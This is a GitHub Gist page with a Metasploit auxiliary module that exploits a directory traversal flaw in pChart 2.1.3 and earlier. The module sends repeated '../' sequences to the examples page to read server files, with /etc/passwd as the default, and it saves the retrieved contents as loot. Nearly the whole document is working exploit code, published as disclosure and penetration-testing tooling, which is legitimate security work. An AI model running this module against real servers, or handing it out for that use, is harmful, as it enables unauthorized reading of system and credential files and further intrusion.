Created
August 25, 2014 11:23
-
-
Save bcoles/301c888e9485a1659881 to your computer and use it in GitHub Desktop.
This module exploits a directory traversal bug in pChart version 2.1.3 or earlier. The module can only be used to retrieve files.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http//metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Auxiliary | |
| include Msf::Auxiliary::Scanner | |
| include Msf::Auxiliary::Report | |
| include Msf::Exploit::Remote::HttpClient | |
| def initialize(info = {}) | |
| super(update_info( | |
| info, | |
| 'Name' => 'pChart Example Page Directory Traversal', | |
| 'Description' => %q{ | |
| This module exploits a directory traversal bug in pChart version | |
| 2.1.3 or earlier. The module can only be used to retrieve files. | |
| }, | |
| 'License' => MSF_LICENSE, | |
| 'Author' => | |
| [ | |
| 'sinn3r', # This module is a rip off of sinn3r's yaws_traversal.rb | |
| 'Balazs Makany', # Discovery and PoC | |
| 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit | |
| ], | |
| 'References' => | |
| [ | |
| ['EDB', '31173'] | |
| ], | |
| 'DisclosureDate' => 'Jan 24 2014' | |
| )) | |
| register_options( | |
| [ | |
| OptInt.new('DEPTH', [true, 'The max traversal depth', 10]), | |
| OptString.new('TARGETURI', [true, 'The path to pChart library', '/pChart2.1.3/']), | |
| OptString.new('FILE', [false, 'The name of the file to download', '/etc/passwd']) | |
| ], self.class) | |
| deregister_options('RHOST') | |
| end | |
| def run_host(ip) | |
| # No point to continue if no filename is specified | |
| if datastore['FILE'].nil? or datastore['FILE'].empty? | |
| print_error 'Please supply the name of the file you want to download' | |
| return | |
| end | |
| # Create request | |
| res = send_request_cgi( | |
| 'uri' => normalize_uri(target_uri.path,'/examples/index.php'), | |
| 'vars_get' => Hash[{ | |
| 'Action' => 'View', | |
| 'Script' => "#{'../' * datastore['DEPTH']}/#{datastore['FILE']}" | |
| }.to_a.shuffle] | |
| ) | |
| # Show data if needed | |
| if res and res.code == 200 | |
| vprint_line "#{res.body}" | |
| fname = File.basename datastore['FILE'] | |
| path = store_loot( | |
| 'pchart.http', | |
| 'application/octet-stream', | |
| ip, | |
| res.body, | |
| fname | |
| ) | |
| print_status "File saved in: #{path}" | |
| vprint_warning "Error retrieving file #{datastore['FILE']} from #{ip}" if res.body.length == 0 | |
| else | |
| print_error "Nothing was downloaded" | |
| end | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment